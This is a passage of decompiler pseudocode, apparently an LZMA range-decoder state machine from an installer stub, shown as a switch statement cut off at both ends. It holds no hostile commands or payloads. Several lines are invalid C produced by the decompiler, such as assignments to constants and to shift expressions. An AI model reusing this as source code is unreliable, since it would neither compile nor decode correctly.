                                                                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											_t156 = __ebp - 0x70;
                                                                                                                                                                                                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            											__eflags =  *_t156;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											while(1) {
                                                                                                                                                                                                                            												L48:
                                                                                                                                                                                                                            												__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            												if(__ebx >= 0x100) {
                                                                                                                                                                                                                            													break;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            												__edx = __ebx + __ebx;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            												__esi = __edx + __eax;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            												__ax =  *__esi;
                                                                                                                                                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            												__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            													__cx = __ax;
                                                                                                                                                                                                                            													_t170 = __edx + 1; // 0x1
                                                                                                                                                                                                                            													__ebx = _t170;
                                                                                                                                                                                                                            													__cx = __ax >> 5;
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            													 *__esi = __ax;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            													0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            													__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            													 *__esi = __cx;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            													continue;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													goto L46;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L54:
                                                                                                                                                                                                                            											_t173 = __ebp - 0x34;
                                                                                                                                                                                                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                                                            											__eflags =  *_t173;
                                                                                                                                                                                                                            											goto L55;
                                                                                                                                                                                                                            										case 0xf:
                                                                                                                                                                                                                            											L58:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											_t203 = __ebp - 0x70;
                                                                                                                                                                                                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            											__eflags =  *_t203;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											L60:
                                                                                                                                                                                                                            											__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            											if(__ebx >= 0x100) {
                                                                                                                                                                                                                            												L55:
                                                                                                                                                                                                                            												__al =  *(__ebp - 0x44);
                                                                                                                                                                                                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                                                            												goto L56;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L61:
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            											__edx = __ebx + __ebx;
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            											__esi = __edx + __eax;
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            											__ax =  *__esi;
                                                                                                                                                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            											__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            												__cx = __ax;
                                                                                                                                                                                                                            												_t217 = __edx + 1; // 0x1
                                                                                                                                                                                                                            												__ebx = _t217;
                                                                                                                                                                                                                            												__cx = __ax >> 5;
                                                                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                                                                            												 *__esi = __ax;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            												0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            												__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            												 *__esi = __cx;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            												goto L60;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 0x10:
                                                                                                                                                                                                                            											L109:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											_t365 = __ebp - 0x70;
                                                                                                                                                                                                                            											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            											__eflags =  *_t365;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											goto L111;
                                                                                                                                                                                                                            										case 0x11:
                                                                                                                                                                                                                            											L69:
                                                                                                                                                                                                                            											__esi =  *(__ebp - 0x58);
                                                                                                                                                                                                                            											 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                                                                            											while(1) {
                                                                                                                                                                                                                            												 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                                            												goto L133;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 0x12:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            												 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                                                                            												__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                                                                            												while(1) {
                                                                                                                                                                                                                            													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                                            													goto L133;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                                            											__eflags = __eax;
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                                                            											goto L130;
                                                                                                                                                                                                                            										case 0x13:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            												_t469 = __ebp - 0x58;
                                                                                                                                                                                                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                                                            												__eflags =  *_t469;
                                                                                                                                                                                                                            												 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                                                            												 *(__ebp - 0x40) = 8;
                                                                                                                                                                                                                            												L144:
                                                                                                                                                                                                                            												 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                                                                            												goto L145;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                                            											 *(__ebp - 0x30) = 8;
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                                                            											L130:
                                                                                                                                                                                                                            											 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            											 *(__ebp - 0x40) = 3;
                                                                                                                                                                                                                            											goto L144;
                                                                                                                                                                                                                            										case 0x14:
                                                                                                                                                                                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x80);
                                                                                                                                                                                                                            											 *(_t613 - 0x88) = _t533;
                                                                                                                                                                                                                            											goto L1;
                                                                                                                                                                                                                            										case 0x15:
                                                                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                                            											__al = __al & 0x000000fd;
                                                                                                                                                                                                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                                            											goto L120;
                                                                                                                                                                                                                            										case 0x16:
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                                            											__eflags = __eax - 4;
                                                                                                                                                                                                                            											if(__eax >= 4) {
                                                                                                                                                                                                                            												_push(3);
                                                                                                                                                                                                                            												_pop(__eax);
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 4);
                                                                                                                                                                                                                            											 *(__ebp - 0x40) = 6;
                                                                                                                                                                                                                            											__eax = __eax << 7;
                                                                                                                                                                                                                            											 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                                                                            											 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            											goto L145;
                                                                                                                                                                                                                            										case 0x17:
                                                                                                                                                                                                                            											L145:
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                                            											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											goto L149;
                                                                                                                                                                                                                            										case 0x18:
                                                                                                                                                                                                                            											L146:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											_t484 = __ebp - 0x70;
                                                                                                                                                                                                                            											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            											__eflags =  *_t484;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											L148:
                                                                                                                                                                                                                            											_t487 = __ebp - 0x48;
                                                                                                                                                                                                                            											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                                            											__eflags =  *_t487;
                                                                                                                                                                                                                            											L149:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                                            											if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												__ebx =  *(__ebp - 0x50);
                                                                                                                                                                                                                            												0 = 1;
                                                                                                                                                                                                                            												__eax = 1 << __cl;
                                                                                                                                                                                                                            												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x7c);
                                                                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            												while(1) {
                                                                                                                                                                                                                            													 *(_t613 - 0x88) = _t533;
                                                                                                                                                                                                                            													goto L1;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            											__esi = __edx + __eax;
                                                                                                                                                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            											__ax =  *__esi;
                                                                                                                                                                                                                            											__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            												__cx = __ax;
                                                                                                                                                                                                                            												__cx = __ax >> 5;
                                                                                                                                                                                                                            												__eax = __eax - __ecx;
                                                                                                                                                                                                                            												__edx = __edx + 1;
                                                                                                                                                                                                                            												__eflags = __edx;
                                                                                                                                                                                                                            												 *__esi = __ax;
                                                                                                                                                                                                                            												 *(__ebp - 0x50) = __edx;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            												0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                                            												 *__esi = __cx;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            												goto L148;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												goto L146;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 0x19:
                                                                                                                                                                                                                            											__eflags = __ebx - 4;
                                                                                                                                                                                                                            											if(__ebx < 4) {
                                                                                                                                                                                                                            												 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                                                                            												L119:
                                                                                                                                                                                                                            												_t393 = __ebp - 0x2c;
                                                                                                                                                                                                                            												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                                                                            												__eflags =  *_t393;
                                                                                                                                                                                                                            												L120:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                                                                            												if(__eax == 0) {
                                                                                                                                                                                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                                                                            												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                                                                            													goto L171;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                                            												_t400 = __ebp - 0x60;
                                                                                                                                                                                                                            												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                                                                            												__eflags =  *_t400;
                                                                                                                                                                                                                            												goto L123;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx = __ebx;
                                                                                                                                                                                                                            											__eax = __ebx;
                                                                                                                                                                                                                            											__ecx = __ebx >> 1;
                                                                                                                                                                                                                            											__eax = __ebx & 0x00000001;
                                                                                                                                                                                                                            											__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                                                            											__al = __al | 0x00000002;
                                                                                                                                                                                                                            											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                                                            											__eflags = __ebx - 0xe;
                                                                                                                                                                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                                            											if(__ebx >= 0xe) {
                                                                                                                                                                                                                            												__ebx = 0;
                                                                                                                                                                                                                            												 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                                                                            												L102:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                                            												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                                            													__eax = __eax + __ebx;
                                                                                                                                                                                                                            													 *(__ebp - 0x40) = 4;
                                                                                                                                                                                                                            													 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                                            													__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            													L108:
                                                                                                                                                                                                                            													__ebx = 0;
                                                                                                                                                                                                                            													 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            													 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                                            													 *(__ebp - 0x44) = 0;
                                                                                                                                                                                                                            													 *(__ebp - 0x48) = 0;
                                                                                                                                                                                                                            													L112:
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                                                                            														_t391 = __ebp - 0x2c;
                                                                                                                                                                                                                            														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                                                                            														__eflags =  *_t391;
                                                                                                                                                                                                                            														goto L119;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            													__esi = __edi + __eax;
                                                                                                                                                                                                                            													 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            													__ax =  *__esi;
                                                                                                                                                                                                                            													__ecx = __ax & 0x0000ffff;
                                                                                                                                                                                                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                                            													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                                                                            														__ecx = 0;
                                                                                                                                                                                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                                                                            														__ecx = 1;
                                                                                                                                                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                                            														__ebx = 1;
                                                                                                                                                                                                                            														__ecx =  *(__ebp - 0x48);
                                                                                                                                                                                                                            														__ebx = 1 << __cl;
                                                                                                                                                                                                                            														__ecx = 1 << __cl;
                                                                                                                                                                                                                            														__ebx =  *(__ebp - 0x44);
                                                                                                                                                                                                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                                                                            														__cx = __ax;
                                                                                                                                                                                                                            														__cx = __ax >> 5;
                                                                                                                                                                                                                            														__eax = __eax - __ecx;
                                                                                                                                                                                                                            														__edi = __edi + 1;
                                                                                                                                                                                                                            														__eflags = __edi;
                                                                                                                                                                                                                            														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            														 *__esi = __ax;
                                                                                                                                                                                                                            														 *(__ebp - 0x50) = __edi;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														 *(__ebp - 0x10) = __edx;
                                                                                                                                                                                                                            														0x800 = 0x800 - __ecx;
                                                                                                                                                                                                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                                                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                                            														 *__esi = __dx;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            														L111:
                                                                                                                                                                                                                            														_t368 = __ebp - 0x48;
                                                                                                                                                                                                                            														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                                                                            														__eflags =  *_t368;
                                                                                                                                                                                                                            														goto L112;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														goto L109;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0xc);
                                                                                                                                                                                                                            												__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                                                            													__ebx = __ebx | 0x00000001;
                                                                                                                                                                                                                            													__eflags = __ebx;
                                                                                                                                                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            													L101:
                                                                                                                                                                                                                            													_t338 = __ebp - 0x48;
                                                                                                                                                                                                                            													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                                            													__eflags =  *_t338;
                                                                                                                                                                                                                            													goto L102;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													goto L99;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__edx =  *(__ebp - 4);
                                                                                                                                                                                                                            											__eax = __eax - __ebx;
                                                                                                                                                                                                                            											 *(__ebp - 0x40) = __ecx;
                                                                                                                                                                                                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                                                                                            											goto L108;
                                                                                                                                                                                                                            										case 0x1a:
                                                                                                                                                                                                                            											L56:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                                            											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x68);
                                                                                                                                                                                                                            											__al =  *(__ebp - 0x5c);
                                                                                                                                                                                                                            											__edx =  *(__ebp - 8);
                                                                                                                                                                                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                                            											 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x14);
                                                                                                                                                                                                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                                                                            											__eax = __ecx + 1;
                                                                                                                                                                                                                            											__edx = 0;
                                                                                                                                                                                                                            											_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                                            											__edx = _t192;
                                                                                                                                                                                                                            											goto L79;
                                                                                                                                                                                                                            										case 0x1b:
                                                                                                                                                                                                                            											L75:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                                            											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                                            											__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                                            											if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                                            												__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__edx =  *(__ebp - 8);
                                                                                                                                                                                                                            											__cl =  *(__eax + __edx);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            											 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                                                            											 *(__eax + __edx) = __cl;
                                                                                                                                                                                                                            											__eax = __eax + 1;
                                                                                                                                                                                                                            											__edx = 0;
                                                                                                                                                                                                                            											_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                                            											__edx = _t274;
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x68);
                                                                                                                                                                                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                                            											_t283 = __ebp - 0x64;
                                                                                                                                                                                                                            											 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                                            											__eflags =  *_t283;
                                                                                                                                                                                                                            											 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                                                            											L79:
                                                                                                                                                                                                                            											 *(__ebp - 0x14) = __edx;
                                                                                                                                                                                                                            											goto L80;
                                                                                                                                                                                                                            										case 0x1c:
                                                                                                                                                                                                                            											while(1) {
                                                                                                                                                                                                                            												L123:
